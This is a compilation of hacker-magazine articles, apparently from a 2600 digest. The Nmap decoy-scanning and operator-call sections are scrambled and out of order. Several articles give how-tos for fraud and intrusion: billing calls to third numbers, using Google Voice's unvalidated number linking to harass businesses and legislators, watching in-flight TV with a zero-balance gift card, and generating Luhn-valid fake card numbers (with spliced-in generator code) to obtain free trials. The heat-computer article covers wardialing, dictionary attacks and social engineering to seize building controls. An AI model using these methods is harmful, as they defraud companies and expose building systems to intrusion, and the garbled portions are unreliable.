see: “SRC=12.250.X OS details: Linux 2.1.168.3.12 (x86) Uptime: 0. the firewall logs show that access was attempted from our specified address above. we start by Nmap telling it which network card to use and. but it's also an educational tool that will show you the many ways your phone calls can be overheard.1.36. Of course.48.org/nmap/man/man➥bypass-firewalls-ids.9 ➥ . We learned how to change your IP address while scanning. ➥org/nmap/man/man-performance.6.168. and 5.1. this can be changed as well. PO Box 752. Middle Island.org/nmap/man/man➥port-scanning-basics. Just like the manual said.24. ➥html 3. Now let’s take a quick look at our iptables log and see what happens.6.9. but what about multiple IP addresses?
$ sudo nmap -e eth0 -P0 -D 1 ➥ 2.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=42 ➥ ID=16809 PROTO=TCP SPT=63815 DPT=234 WINDOW=3072 ➥ RES=0x00 SYN URGP=0
Well. Nmap website: http://www. So let’s recap what we have (hopefully) learned today. ➥insecure.org ➥ ) at 2009-02-15 00:33 PST Warning: OS detection for ➥ 192.25.1.1. 3.
Jan 15 00:33:54 mythbox IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4: ➥ 78:18:c6:08:00 SRC=12.24. Full color diagram on the front with explanation on the back. Well.2600.125. Address Spoofing: http://www.657 seconds
➥ IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4 ➥:78:18:c6:08:00 SRC=3.62 ( http://nmap.27 will be ➥ MUCH less reliable because we did not find at least ➥ 1 open and 1 closed TCP port Interesting ports on ➥ mythbox (192.6.125.36.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=43 ➥ ID=16809 PROTO=TCP SPT=63815 DPT=234 WINDOW=4096 ➥ RES=0x00 SYN URGP=0 Jan 15 00:33:54 mythbox
Resources

Telkom in South Africa. Third Number: You can bill someone else’s phone number for a call you want to make. it’s very unusual for many types of operator handled calls to be made these days. which means the skies have returned to their usual leaden gray. you must decide how to pay: Calling Number: You can bill the phone number from which you’re calling . special delivery. Speaking of calling overseas. BT in the UK. Younger readers growing up in the world of unlimited cell phone plans and unlimited long distance may not even know what a collect call is. a hefty surcharge is collected for this service. station-to-station rates can also apply to calls with special billing arrangements or where “time and charges” is requested. but I like his parents. you can call anywhere in the world as long as they agree to pay the charges. he’s too busy cashing unemployment checks and watching Jerry Springer to do any actual work. you took a big financial risk by calling station-to-station. These can be used all over the world to charge calls to your home telephone bill . Collect: When you make a collect call. for which calls are billed directly rather than being billed through your telephone company. there are still a healthy number of collect calls in the mix. I’m not a big fan of my neighbor. If the person you were trying to reach wasn’t there. Operator dialed station-to-station calls are generally handled for visually impaired or disabled customers.) and vice-versa. Note that long distance carriers can bill ILEC calling cards. or how to use other types of operator handled calls. it’s free to you. It also means leaves from my no-good. Person to Person: When long distance calls were very expensive (particularly international long distance calls). the operator takes the name of the person you are attempting to reach and will try to contact that person directly. you’d still have to pay for the call. 
All billing for operator-handled calls is either based on a station-to-station or person-toperson call: Station to Station: This is the same billing as just dialing 1+ (NPA) NXX-XXXX direct. You are only connected (and charged for the call) if the operator can reach your party. Once you decide the type of call you want to make (assumed to be station-to-station if you don’t specify otherwise). operators only dial station-to-station calls for ordinary customers when they report trouble on the line. However. All this fuming got me to thinking what would happen if my deadbeat neighbor’s line is disconnected for nonpayment. but you can have an operator dial the call for you. etc. today’s collect calling rates range from high to completely outrageous. These are different than calling cards issued by long distance carriers. However. I’m thinking of returning this week’s batch of leaves in his mailbox.S.generally at outrageous rates. Believe it or not. In a world where long distance calling is effectively free. the following operator handled call types are still available from AT&T long distance operators and from local ILEC phone company operators (although you may have trouble finding an operator who actually knows how to place them). it’s possible to call phone numbers in the U. You wouldn’t believe how often people will agree
Telecom Informer
by The Prophet
Hello. unlike in the good old days of the Bell System where rates were high but at least consistent. but it doesn’t work the other way around. but someone else answered the phone.

so OCI was frequently exploited by phreaks in the early 1990s. billed to a third number. I’ll see you again in the winter. keep our operators busy making person-to-person third party billed calls with time and charges!
. After the call is completed. $4. I’m out of space in this column. If charges are disputed by the third party. Well. • 1-800-COLLECT: Operated by Verizon. an operator can break in and interrupt a call in progress. AT&T will back-charge the originating number. If someone at that number accepts the charges. OCI was one of the first carriers in this market. 55 cent additional payphone surcharge. given the number of disconnect orders I’m processing on a daily basis. you’ll be asked to pay another way. available services may vary.29 per minute plus 12. This is at the discretion of the carrier and generally depends upon the type of phone you’re calling from. you will more likely than not be connected to an “alternative operator service” or AOS. Third-party billed calls are not always verified before they are connected. You’ll hear a “bong” tone. But I digress.99-$6. When you follow the standard procedure to place a “0+” call.THE HACKER DIGEST . if you’re calling from a home telephone or business line. Here are some example rates for a collect call: • 1-800-ONE-DIME: Operated by Sprint. The ability to call cellular phones collect is a relatively new development. The charge is a flat $9. Sprint. Otherwise. allows billing to cell phones (excluding Verizon and Alltel). • 1-800-CALL-ATT: This service allows collect calls to prepaid and post-paid cell phones from AT&T. Busy Line Verification: An operator can verify that a line that rings busy is actually busy (not just off hook). it’s paradoxically more expensive: there is a $7. However. To accomplish this. shady AOS practices continue.99 surcharge. The operator will not connect your call to the existing call in progress. charging very high rates to consumers and paying fat commissions to owners of payphones choosing their services. Their operator service platform was poorly designed and their operators were poorly trained. and most CLECs and VoIP providers do not support this billing type.99 operator surcharge. 
carriers use the premium SMS platform for billing (I have written about this topic previously).59 per minute + 12. it’s a rapidly dwindling criterion). Assuming that this criterion is met (and believe me. AT&T will third-party bill calls without verification provided that a LIDB lookup indicates the line can be billed (or the LIDB lookup fails. only fixed-line residential and business numbers can be billed for such calls. It’s worth noting that CLEC. In the meantime. It can be fun finding out which services are offered. at which time you dial 0. which happens occasionally). The traditional way to call collect (from either a fortress phone or a POTS line) is to dial 0 plus the area code and phone number you’re calling.
to pay for your calls! Time and Charges: You can request that a call be placed with “time and charges. a Line Information Database (LIDB) lookup is processed on the back end to determine whether the number you are calling is authorized for billing. 10 cents per minute plus a $2. but will inform the called party that you are trying to reach them. independent. and T-Mobile post-paid accounts. The operator will then dial the number you are billing and will ask if the charges are authorized. • 1-800-CALL4LES(S): $3. Muddying the picture further are toll-free “dialaround” services such as 1-800-FAIRCALL and 1-800-COLLECT. you’ll be connected to the number you’re calling. • Qwest 0+: For intraLATA calls in Washington State. $1. mobile phone. If it’s a collect call.99 for up to 20 minutes. so it’s time to rake my lawn again and bring this issue of “The Telecom Informer” to a close. and how accurate the billing is. Back to my pitiful neighbor and the collect call he’ll be making to his parents. For example.” The operator will place the call with the type and billing you direct. or billed to a calling card.9 percent USF plus tax. you’ll be connected to the number you’re billing.9% percent plus tax. which are completely unregulated. except to the disabled. AT&T simply eats the loss and blacklists the originating number for future unverified third-party billed calls. If you’re calling collect or billing a third number. Busy Line Interrupt: If you claim there is an emergency and agree to pay a fee for the service. an operator will come back on the line to say how long you talked and how much the call cost. In general. Where they do so. and competitive long distance carriers are not generally required to offer operator services. you’ll be asked for your name.50 surcharge and the rate is $1. consumer complaints are rampant about charges exceeding $5 per minute for collect calls.49 surcharge. Even today. your call will be connected. 
Either an operator or (as is usually the case these days) an automated operator will ask you what type of call you are making: collect. If it’s a third-party billed call. 50 cents to connect and 45 cents per minute. If you’re calling a landline using 1-800-CALL-ATT. if the charges are again disputed. 25 cents per minute flat.

Link a pizza place.
. For outgoing dialing. Many Apple Stores have iPhones on display and active for calls by anyone who walks up. Huh? This is Pizza Hut. anyone calling your Google Voice number will automatically ring all of your linked phones. There are many opportunities here for those wishing to enhance voice communication offerings. Thanks Google! *One way that Google may be able to stop this.VOLUME 26
by Faz and caphrim007
GrandCentral. then input a number to call. and pizza parlor (“Hello. or to simply have fun: 1. link them in your Google Voice number then publish it to the web as free Microsoft Support. you can abuse the on-the-fly conference feature.
3. Initiate a call between an evil hacker and the FBI. work phone. This will force you to be present at the phones you list. Link these numbers to your Google Voice number and initiate a call between them for free.
2. even though you may be talking from your cell phone. This action then rings your selected number. pay-as-you-go phone. With Google Voice. to make free calls. You can link your home phone.THE HACKER DIGEST . Nothing more. As an added bonus. this is not required. then rings the remote number and connects the two. Domino’s. review past issues of 2600). “Hello. establish a call from another external party (Domino’s) to your Google Voice number and conference them in while they are ringing. or at least limit the scope of misuse. No I didn’t. initiate a call between the linked iPhones and Verizon tech support!
The drawback to the above is that you cannot listen in on the fun. That’s it. if you have two Google Voice accounts. a beta offering that was available through invitation only. It is trivial to obtain phone numbers from payphones (if you don’t know how.google. Anyone who calls the Google Voice number will automatically ring all the representatives’ phones. is to immediately ring the phone numbers that you add to your Google Voice number and prompt you to input a security code. you simply input the phone numbers you wish to be rung when a call comes into your Google Voice number. cell phone.com/voice) is. Faz? There is no Faz here. you called me. There is no validation of the phone numbers you link to your Google Voice number! That is. why are you calling me? I didn’t. and. You now have a 3-way conference call! The list of potential (mis)use* is endless. Mario’s Pizza. and your Google Voice phone number will show up in the CallerID. Simply establish a call between one of your phones and an external party (Pizza Hut). 5.” Make free calls from pay phones. then place a call through Google Voice to another pizza place. Link all your state representatives’ phone numbers (be sure to include personal and cell if you have them!) to a single Google Voice number and publish to the web. as of this writing. girlfriend’s phone. though it appears the service will become more public in the near future. You can also initiate dialing from one of your linked phones in the Voice web interface to another phone number. Now comes the fun part.”) to your Google Voice number via the web interface. By linking your phone numbers to the selected Google Voice phone number. Get the phone numbers. like all Google services. now known as Google Voice (http://www.
4. you select the phone from your list. at the same time and using a different account. However. This is great for covert meet ups. you can choose a phone number and then link all of your phones to this main number to help maintain your privacy (by not giving out your personal phone numbers) and to promote a ‘follow my phone’ type offering. But.

it’s amateur radio operators who are first to get on the air to coordinate relief efforts. Many times. General. You’re going to need a bunker deep inside a mountain. but on doomsday. Could doomsday be triggered by a shift in the magnetic poles. You will need some form of communication.org/to see when they are having exams in your area. FM. A Technician class license is the first one you get and has the most restrictions on amateur bands. watch all the apocalyptic and zombie movies ever made. the Internet will be severely crippled. “Am I ready?” If the apocalypse happens in 2012 you don’t want to be caught with your pants down. Getting a scanner may not be good enough. Look up ARES or RACES for more info. It’s a type of radio that can be connected to your computer via USB. P. Go to http://arrl. Armstrong jp@hackmiami. It’s more than likely that doomsday is not December 21.org
December 21. You’ll need to be prepared. Extra class licenses have the least restrictions. shortwave. BSoDTV. GMRS. Transatlantic telecommunication cables may very well be destroyed. you and other radio operators can set up bulletin board system (BBS) style nets with the help of software-defined radios. and for that you’ll need to get an amateur radio license. That’s why it’s good to have an amateur radio! Many ham radios act like scanners. 2012. AM. Sure it’s unlocked for use on any service provider. or all three exams for only $14.THE HACKER DIGEST . For more info on amateur radio check out: http://hackmiami.VOLUME 26
For the rest of the survival guide. there are three types of license classes: Technician. filters. FRS. You’ve watched the movies and now you must prepare for the worst. and Extra. and packet sniffing. you can write custom code to do spectrum analyzing. you’re going to need to practice. Shout-outs: Ed. Look for “wide receive” feature. CB. That pwned iPhone just won’t do. I suggest watching those movies. 2012 is just around the corner. So you can listen to different frequencies like airband. They no longer test for Morse code. or perhaps some unstoppable airborne virus? Who knows! Either way you have to ask yourself. In the US. and the HACKMIAMI crew!
amateur bands and your local Mickie D’s drive-thru. Including the foreign ones! You don’t want to be one of the few humans left not knowing what to do. consider yourself covered (at least on the communications side). Consider getting a software-defined radio. To prepare to communicate after doomsday. modulation/ demodulation. A supposed cataclysmic event is to happen that day. For more info on amateur radio check out: http://hackmiami.org/wiki/Ham_Radio. Just imagine thousands of people across the country setting up a makeshift communications infrastructure to prepare themselves for an actual emergency. Field Day gives hams an opportunity to go outside and test out their emergency radio equipment. it’s more than likely that you won’t be getting any reception. First things first. With the help of GNU Radio. but if it is. Many local amateur radio clubs in the US have an annual Field Day. preferably at high elevation–if it’s not magnetic poles shifting it will be global warming that takes us out.
Post-Apocalyptic Communications
by J. Many local amateur radio clubs in the US have an annual Field Day. police. Maybe after doomsday.

and Google Reader. Plus.com/ ➥WoWInsider) to Bacon-lovers (http://
➥twitter. Obviously. By lurking. processed. however. Maybe that’s how you find out who hangs out at your favorite local places when you’re looking for new friends. Of course.
. others join in that you’ve probably never met and might never meet in your lifetime. Twitter accounts. though? I’m interested in security. It will refine. you can leverage microblogging services like Twitter to find and follow likeminded strangers. This collective will give input on ideas from within itself. Eventually. disprove. Facebook profiles. similar interests.000 foot view of your online social sphere. self-described social media addicts have no problem finding their cliques. and pretty soon you end up with a news-feed of data you’re interested in. or validate answers given to questions within the collective. The people you follow will frequently ask or answer questions of other folks.net
There’s no doubt that social networking is all the rage on the Internet these days. Friendfeed can aggregate most content from your other social network accounts. Maybe that’s where you keep all of your professional contacts or hunt for job opportunities. Facebook and MySpace are far too cumbersome and broad-sweeping in their content to be used efficiently. quite a few security geeks have blogs. Digg. won’t immediately integrate you into the hive. like Twitter on steroids. you just like to compete in the popularity contest to see how many e-friends you can collect. online. Maybe. I’ve found that this hive-mind functionality works best on lightweight services like the aforementioned Twitter. you need to establish your presence with relevant content that’s equally as interesting to them as their content is to you. Brightkite is a location-aware microblog with photo hosting ability.THE HACKER DIGEST . Maybe that’s where you go to get your 50. Assuming enough of them follow you back. Instead of just looking for your existing friends online. You can follow them as well. or simply because they’re a friend of a friend (of a friend of a friend). most of the services I mentioned have easy-to-use RSS feeds that can be indexed. and the like. Your reasons for befriending them may be many: interesting photos or content. and I’ve found that. It will challenge you to participate by giving as much as you get. you can learn a lot. What if you wanted to craft a specialized hive-mind.VOLUME 26
Roll Your Own Hive-Mind
by ax0n ax0n@h-i-r. for example. or with link-sharing tools like Delicious. Security nerds like me have SecurityTwits (http:// ➥twitter. Places like MySpace and Facebook have become ubiquitous social hubs that start out as a circle of your real-life friends. Jumping onto Twitter and following every single member of SecurityTwits. if you want people in your niche to acknowledge your existence on these social networks. It will link to fascinating content elsewhere on the web that other members might not otherwise find. aggregated.com/securitytwits). you will have a powerful hivemind at your fingertips. and searched later. LinkedIn has a business focus.com/bacontwits) can find a niche in most social networks. but everyone from World of Warcraft Gamers (http://twitter.

by Outlawyr

First, the usual disclaimer: Don’t do the crime if you can’t do the time. Don’t do it! And now, on to the show.

I recently flew on Frontier Airlines for the first time. Not bad for a discount airline. The airline is in Chapter 11, but has actually started turning a profit as of November 2008, so perhaps that accounts for the cheerful disposition. They must not whip their employees like the other carriers. Anyway, every seat has its own little TV screen with DirecTV, a broadcast satellite service controlled by Liberty Media. On your arm rest you have controls for volume, channel and brightness, as well as a standard stereo headphone jack. Earplugs are free. Satellite TV is $5.99. Movies are $8, and there are 3 to choose from. At first you can channel surf at will, but after the initial teaser phase a message comes up telling you to stick your credit card in the slot if you want to continue watching.

Frugal man that I am, I resisted the urge to give up my hard earned money for a couple hours of television. But this left me time to ponder how one might hack the system and watch for free. I tried playing with various button combinations, but this got me nowhere. Then I remembered that I’d been carrying around an old American Express gift card. These cards look and function like a credit card, but have a predetermined amount on them when purchased. The one I had was originally worth $100, but I’d used it all, so the balance was $0. Unlike a credit card, this gift card isn’t traceable to an individual. Of course, they know who is sitting in what seat on the airplane, but one can always play dumb. How was I to know what the balance was on the card? And this was all in the name of science. If it wasn’t for science, we wouldn’t even have airplanes. Thanks science!

So I swiped my gift card in the credit card slot, figuring that they don’t process the credit cards while in flight, but rather wait until they land. After all, why clog the airways with more transmissions? After swiping the card I was told to press the up channel button to confirm, and then, like magic, I had access to all channels, including the 3 movies. I then turned the brightness all the way down, because there really was nothing interesting on. If you turn brightness all the way down, the screen goes black. Solving this little puzzle did, of course, serve my purpose of killing some time while stuck in a tiny little seat.

This, however, leads one to ponder what other situations require a credit card but don’t actually run the card at the time of purchase. Or DirecTV. Or gift cards. Since I always carry my zero value gift card with me, I’m sure I’ll get a chance to test it out in the future (without breaking any laws of course). If anyone has some insight, I’d love to hear from you.

Resources
• American Express gift card http://www.americanexpress.com/gift/giftcardslanding.do
• Frontier Airlines http://www.frontierairlines.com/frontier/home.shtml

Shoutout to my lady, Mrs. Outlawyr!

Free Trials
Avoid Giving out Your Credit Card Number
by hostileapostle

First of all, as a disclaimer, the following information is intended for informational purposes only. While this information is already widely available to anyone who wishes to find it, please follow the golden rule and don’t do anything you wouldn’t want done to you. With that said, I get really frustrated sometimes when a website advertises a limited “free trial” and then asks for my credit card information. Of course, their plan is to start billing you if you don’t cancel within the trial period. However, my opinion is that this is bad business practice, and I’m happy to circumvent it if I can. There is no good reason for them to have my credit card number if the free trial is really free. Fortunately, some, if not most, of these web sites will not check to see if the number is real. They will only check to see if it is valid.

Many of the readers here probably know that credit card numbers are generated using something called a “Luhn check.” A Luhn check is a very simple algorithm which doubles the odd digits and does a sum to see if the number is divisible by 10. The credit card companies actually use a slightly modified version of this algorithm that involves a check digit. This is the very last digit of the credit card number, but it’s easy enough to include this digit. So, here are the steps to produce a number that will pass the Luhn check on a 16-digit card number:

1. Starting with the first digit, double every other number.
2. If doubling a number results in a two-digit number, add those digits together to produce a single-digit number.
3. Replace the odd digits with the new ones just created. You should now have 16 numbers consisting of the new numbers and the original even numbers.
4. Add up all sixteen numbers.
5. Manipulate the check digit so that the sum is divisible by 10.

So, as an example, let’s use a random number, say 4264 1658 2275 1393. After doubling the odd digits and summing the ones that end up being two digits, we get 8234 2618 4255 2393. The sum of these digits is 67, which is not divisible by 10. So, to fix this, we change the check digit from 3 to 6. Our valid number is now 4264 1658 2275 1396. One other thing I did here was I made sure the first digit was 4. This identifies the number as a Visa number. Here are the numbers for the major credit card companies:

3 - American Express
4 - Visa
5 - MasterCard
6 - Discover

I used this method a while back to obtain a free trial from http://www.realtytrac.com/. Whether that is really somebody’s card number is anyone’s guess, so I cancelled before the trial period ended, just in case. Of course, there’s the small chance I could have just gotten lucky and found someone’s real number. I don’t know how picky the different websites are. It would be a no-brainer to write a script to spit out millions of valid numbers, but if you need that many, I fear what you might be doing with them. Hope this helps you get some free trials.
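The five steps above, written out as an added example (this is not code from the article): a Luhn validator that reproduces the article’s arithmetic for 4264 1658 2275 1393 and 4264 1658 2275 1396, plus the step-5 check-digit computation and the issuer table the article gives. The function and variable names are my own. The point the article makes is visible in the code: a Luhn-valid number is merely self-consistent, so a site that stops at this check has verified nothing about whether the card exists.

```python
"""Luhn check as described in the article's five steps (added example)."""

# First-digit table as given in the article.
ISSUER_BY_FIRST_DIGIT = {"3": "American Express", "4": "Visa",
                         "5": "MasterCard", "6": "Discover"}


def _digits(number: str) -> list[int]:
    """Drop the spaces people type between groups; anything else is rejected."""
    cleaned = number.replace(" ", "")
    if not cleaned.isdigit():
        raise ValueError("card number must contain only digits and spaces")
    return [int(c) for c in cleaned]


def fold_odd_digits(number: str) -> str:
    """Steps 1-3: the digit string after doubling and folding.

    A digit is doubled when its offset from the right-hand end is odd, which
    for a 16-digit number is exactly 'starting with the first digit, double
    every other number' as the article puts it; counting from the right makes
    the same rule work for other lengths. 4264 1658 2275 1393 becomes
    8234 2618 4255 2393, matching the article.
    """
    digits = _digits(number)
    last = len(digits) - 1
    out = []
    for i, d in enumerate(digits):
        if (last - i) % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9          # same result as adding the two digits together
        out.append(str(d))
    return "".join(out)


def luhn_sum(number: str) -> int:
    """Step 4: add up every digit of the folded string."""
    return sum(int(c) for c in fold_odd_digits(number))


def luhn_valid(number: str) -> bool:
    """A number passes the Luhn check when the sum is divisible by 10.
    Malformed input (letters, dashes, empty string) simply fails."""
    try:
        return luhn_sum(number) % 10 == 0
    except ValueError:
        return False


def luhn_check_digit(body: str) -> int:
    """Step 5: given every digit except the last, return the check digit that
    makes the full number pass. A placeholder 0 is appended so the body digits
    sit in the same positions they will occupy in the finished number."""
    partial = luhn_sum(body + "0")
    return (10 - partial % 10) % 10


def issuer(number: str) -> str:
    """Issuer by first digit, per the article's table; anything else is 'unknown'."""
    return ISSUER_BY_FIRST_DIGIT.get(number.strip()[:1], "unknown")


if __name__ == "__main__":
    # The article's worked example: ...1393 fails, ...1396 passes.
    for n in ("4264 1658 2275 1393", "4264 1658 2275 1396"):
        print(n, "->", fold_odd_digits(n), "sum =", luhn_sum(n),
              "valid =", luhn_valid(n), issuer(n))
    print("check digit for 426416582275139:", luhn_check_digit("426416582275139"))
```

Running the block prints the folded string 8234261842552393, a sum of 67 for the first number and 70 for the corrected one, and 6 as the check digit for the 15-digit body, all agreeing with the article’s hand calculation.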

If You Can’t Stand the Heat, Hack the Computers! Part Two
Understanding OAS Heat Computers
by The Philosopher

Programming the System

The next option in the menu of commands is perhaps the most exciting. The programming option is used to set every consequential element of the system from time set points to hardware handling. Pressing ‘P’ at the prompt will result in the following sub-prompt for a password:

PASSWORD:

Defaults for this are unknown, although it is likely that they exist and are given to customers at the brief seminar that is recommended for all new OAS owners to attend. If one is truly determined to know the password, I would recommend that the interested hacker also visit the seminar, as it increases the potential to learn about the system by way of practical application. Passwords do not echo to the terminal. Passwords are ten characters in maximum length, an attribute revealed by the audible bell (Control-G character) heard when an eleventh character is entered–this bell will also sound at the MODE: prompt when input in excess of the expected is entered. No features that log invalid password attempts are documented. If an invalid password is entered twice, the OAS will output the directive “redial” to the screen, spew a line of garbage text, and disconnect the user:

PASSWORD: INVALID REDIAL 4_QKvhbhC\v5(ij%Tudy%!#`&XWJd.U’MOu@.D+-LS
NO CARRIER

When a correct password is entered a main menu of four options will appear. The four main options are as follows:

1. CLOCK, DATE
2. SET POINTS
3. MISCELLANEOUS
4. DIALOUT

Selection of any one of these will open a sub-menu of options followed by a question mark. In order to program any of the options in any sub-menu, input the desired value followed by a carriage return <CR>. If a <CR> is pressed without an alteration in value the next option in the submenu will be displayed. If an invalid value is entered, “INVALID ?=HELP” will be printed. As is the case with the main ‘MODE:’ menu, typing a question mark will display all of the potential values for a programmable option. To navigate through the sub-menus without programming, simply press ENTER at the option prompts. ESC is used to exit from programming mode altogether (upon which a password need not be supplied to reenter during the session), and BACKSPACE cancels an entire line of input.

Sub-menu Notes

Sub-menus 1, 2, and 4 are straightforward–programming of the clock, date, set points as seen in the ‘S’ mode, controlling reporting options, and dialout numbers/alarm conditions is accomplished here. The “MISCELLANEOUS” sub-menu, however, requires some explanation. For example, the following options may be displayed in the “MISCELLANEOUS” submenu 3:

OVERIDE/NORMAL? SENSORS? SENSOR LABELS? METERS? METER LABELS? STEAM/HYDRONIC? BURNER SIGNAL? VERSION NOTES? PASSWORD?

The first option, OVERIDE/NORMAL, will set the system in a heat call for one hour if the override value is entered–it may be interrupted at any time during the cycle and turned off, returning the system to ‘normal’ operation. At “SENSORS?” one may manipulate privileges of the apartment temperature sensors (priority) and turn the outside temperature and aquastat sensors on and off. Sensor and meter labels refer to the headings that denote the thermistors and water meter in the current report “R.” “METERS?” provides the options to turn the water meters on and off, specify a scale factor for the flow rate, combine the pulse inputs to a single, double-headed meter, and to turn the water records on and off. “STEAM/HYDRONIC?” is only useful on the single model of heat computers that may be used for steam or hydronic systems. “BURNER SIGNAL?” does not control the burner control signal, which activates the burner–it only permits the user to switch the monitoring of burner on and malfunction signals on or off. One may write “VERSION NOTES” in with the second-to-last

. specifically the process of water circulation. Only ordinary heat and domestic hot water calls are seen above. coupled with the CNAM data of the dialup (backspoofing. Recall the operation of hydronic boilers. date installed/configured. “L” will redisplay the message first seen in the banner immediately upon connection to the system and “V” for Version will print a message similar to the following. To conclude descriptions of all commands. however. supply temperature refers to the temperature of water as it exits the boiler to circulate around the space that it is heating. phoning the legitimate operator at a number listed under ‘Set points’ (Mode S) and leaving a message with a voicemail number with a greeting identifying it as belonging to ‘Optimum Applied Systems. “Water Records” and “More Hourly Records” should reveal with ease the general specifications of the OAS. Incorporated’. and return temperature to that of the water as it returns to the boiler. it is important to retain a knowledge of their workings. Do note. and dial-out phone numbers. address.10 NOV 1995 On/Off System 8 SENSOR UNITAT
This confirms the previous suggestion to the effect that this is a steam system. accessed by the command. or “more hourly records” were not seen on this system at all and are probably boiler-specific. Quite simply. but flame failures. will likely prove extremely useful in either social engineering to obtain the programming password or guessing it in order to further one’s exploration of the heat computer. type of system and number of sensors:
MODE: V V 6310 . overrides. “E” are entirely separate from the initial report. This information. anyone?). with the version. information potentially useful in the attainment of the password and in programming of the settings. as steam systems are also known as ON/OFF or HI/LO fire boilers. that the dialup or IP might be particularly difficult to obtain as the actual operator of the
Footprinting the System A Review/Additional Tips on Obtaining the Password
137
. D2.” and so forth. Water records were also absent from this log. and D3 are available. strongly suggesting that this is a steam system. The only practical reason for offering all of the records as individual segments is that of specificity in monitoring. although some events may be recorded there without the time of their occurrence:
MODE: E
8:27P 8:21P 7:50P 7:46P 7:04P 6:59P 6:05P 6:01P 5:35P 5:30P 4:49P 4:44P 4:00P 3:56P 2:54P 2:49P 2:15P 2:10P 1:29P 1:24P 12:21P OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF 12:16P 11:47A 11:42A 11:10A 11:05A 9:15A 9:15A 8:20A 8:19A 7:06A 7:06A 5:31A 5:30A 4:34A 4:29A 3:04A 2:59A 1:15A 1:10A 12:00M 12:00M ON DHW OFF ON DHW OFF ON DHW OFF HEAT OFF 9:16P ON HEAT CALL OFF HEAT OFF 7:16P ON HEAT CALL OFF ON DHW OFF ON DHW OFF ON DHW OFF ----11:56P 11:00P 10:55P 10:05P 10:00P 9:20P ON DHW 8:09P 8:04P 7:22P ON DHW 6:38P 6:33P 5:59P 5:54P 5:03P 4:58P 4:18P 4:13P 3:23P 3:18P ON DHW OFF ON DHW OFF ON DHW OFF 12:04P OFF ON DHW OFF 9:56A OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW 2:51P 2:47P 1:52P 1:47P 1:00P 12:55P OFF 12:00N 11:17A 11:12A OFF 9:56A 9:00A 8:59A 7:50A 7:50A 5:31A 5:30A 5:07A 5:03A 3:39A OFF ON DHW OFF ON DHW OFF ON DHW ON DHW OFF ON DHW HEAT OFF ON HEAT CALL OFF HEAT OFF ON HEAT CALL OFF ON DHW OFF
This is a record of every burner on/off cycle for the past 84 events. D1. the entire system is designed to facilitate great discretion in what one views during a particular session. As is evident by the redundancy present in several of the options. and as such we need to perform diagnostic tests on the system as a part of your warranty. perhaps containing records such as the supply and return temperature that are only required on hydronic systems.. accompanied by a statement to the effect that “Your heat computer has reached its ___ year point. information universal to all types of heat computers that manage such boilers. Since some of the systems that one may hack might control hydronic boilers. One aspiring to program the OAS could also potentially attempt the age-old callback ruse. Commands such as “Version”. If one wishes to view a complete list of all of the records for a particular day in the past three days at the entry of a single command. XD 1-3. Events. bypasses and power failures may also be logged here depending upon the version.VOLUME 26
This unit displayed this for every date up to June 10.THE HACKER DIGEST .
Several ways exist through which information pertaining to the system may be acquired.

system would logically be the only individual in possession of such information, thus rendering impersonation of him or her absolutely useless. Creative ways to get the dialup may be devised, although the best method as of yet seems to be a simple matter of wardialing the exchange controlled by the company that owns the OAS (in the case of large corporations with inclusive PBXs) or dialing around the phone numbers of the building in which it is likely to be located (with small businesses). Wardialing metropolitan prefixes is also bound to turn up heat computers, possibly of the OAS brand. If so, it is doubtful that it will be greatly protected, as OAS doesn’t seem particularly disposed toward the idea of amateur experimenters logging into heat computers and running commands. The programming password is not echoed to terminal or screen, while it may contain special characters, and it is, unfortunately, unnecessary to enter the programming menu once it has been entered at the initial prompt. In any case, the ten-character password is likely to be vulnerable to a dictionary attack of words containing ten characters or less, especially since no evidence or mention is made or available anywhere of logging failed attempts. Although the version 6310 does not support this, other versions may permit simultaneous logins and command execution in a single ‘session’, enabling one to “eavesdrop” and/or interfere with the session of the legitimate user.

Wherever advanced technology exists, there will be people who are either ignorant or abusive of it. Also, the author of this article has heard of a few rumors of use of the OAS and similar heat computers by landlords to deny tenants heat in a quasi-extortive context or misuse resulting in active heating of a building in the summer or when the temperature outside is otherwise high. Although such incidents are certainly rare, OAS skills would be infinitely useful in the face of their occurrence, proving once again that knowledge regarding any type of technology that controls one’s life is always of use to nearly anyone with any motives. All of the above is merely the beginning; remember, if you can’t stand the heat, get out of the kitchen and into the OAS!

The Software – An Addition

While connecting to the OAS heat computer via a terminal client and manually entering all of the commands might be satisfactory for some, OAS also offers software to automate and enhance the process of heat computer maintenance (whether it is authorized or not), and it has several useful utilities intended clearly for administration. This is an incredibly useful enhancement to the pursuit of hacking OAS Heat Computers, as it reveals several aspects otherwise hidden. This software, available on the OAS website for all to download at http://www.oas-inc.com/, is called ‘Master95’ and can be quite somewhat of a kludge just to install. If the reader will forgive the sudden launch into linear, redundant expository style and the informal shift into the second person, the following will explain the installation process.

It comes in a strange archive format unknown to the WinRAR archive software, called an “SFX CAB Archive” as a .exe file. If you attempt to open/run it as you would any other .exe file, you will receive a window prompting you for a case-sensitive password of enormous maximum length. Ignore that for the moment and open the archive in the archive management software of your choice–the author personally recommends WinRAR. A list of 16 files should appear, beginning with ‘data1.cab’ and ending with “_INST32I.EX_”. Extract and copy all of these files to the desktop or other location where the entire installation process will take place (the desktop is recommended for the sake of convenience). Run SETUP.EXE (it should be the eighth file in the list) by doubleclicking on the icon (it doesn’t run in DOS mode; does that text in the background of the window with the copyright and version appear at all familiar?) and proceed through all of the prompts–agree to the license, etc. Instruct the software to place an icon for Master95 onto the desktop when prompted to do so. Upon reaching the end of the InstallShield Wizard (the application that guides you through the setup process), click “Finish” and run the software by doubleclicking on the desktop icon. The full version of Master95 Master Dial Program Version 1.96 is now installed. As a side note, all of these files in the archive, “STUB.EXE” included, may be freely copied with passwords absent, and the software should operate without any difficulty if all of them are located in the same directory.

